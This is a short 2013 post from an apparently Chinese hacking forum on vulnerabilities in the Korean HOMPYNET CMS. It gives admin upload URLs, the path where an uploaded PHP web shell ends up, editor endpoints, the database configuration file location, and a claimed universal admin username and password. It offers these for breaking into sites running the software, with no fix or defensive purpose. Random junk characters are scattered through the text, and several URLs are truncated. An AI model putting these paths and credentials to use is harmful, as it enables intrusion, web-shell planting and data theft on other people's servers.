找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2091|回复: 0
打印 上一主题 下一主题

韩国HOMPYNET CMS漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:12:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
上传漏洞  :
4 ]/ L, z( q( _, U, B! w) a& W& H% _  o0 I% I
http://www.xxx.com/admin/image_a ... p;iname=&iform=
& W; \8 Y+ O+ g) G! l3 O% r7 v8 q
http://www.xxx.com/admin/image_a ... p;iname=&iform=
  y. n4 W' B& C  E3 V! Q, M; v# D: X# @9 V, w! d6 [
上传后路径:
  V6 c" l+ {3 G$ e7 m0 a. L% A
3 X; J5 P- j; {* X4 s; G8 B4 xhttp://www.xxx.com/bis_web_page/images/shell.php.en7 A# e; V$ Y% F: C1 t( s5 f; t

/ t( z9 T+ S+ H& F6 }1 z4 `- n6 d编辑器:% H8 `( {/ J0 i" ^# v& z
& g0 M6 s  @0 r' O  T+ k# h
http://www.xxx.com/admin/editor/SWE.php
1 \6 Q0 r; |$ ~* L' N. y3 b, ^; l4 \$ r
http://www.xxx.com/program/editor/SWE.php
2 }; f+ e0 q% s: i: Z+ Z$ b( w
; w) ?4 D9 a  `: M数据配置文件路径:! [: }# U% |4 K( Q4 |# |/ S# x9 v
. ~" b; w3 n8 i9 U0 H0 x
http://www.xxx.com/m_config/DATA/g_setting.php1 d+ M/ Y) B+ v
8 Y' h' j* z" C3 ~' N+ g
此程序通用后台账号 :gamsiw  php99. @0 K* d4 Z- ^  y) G+ L
) h' x9 `! V$ p4 l$ ?
1 F$ ^! [) N) ^2 N+ {. _

% z: L7 j/ V$ X; `& x  D7 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表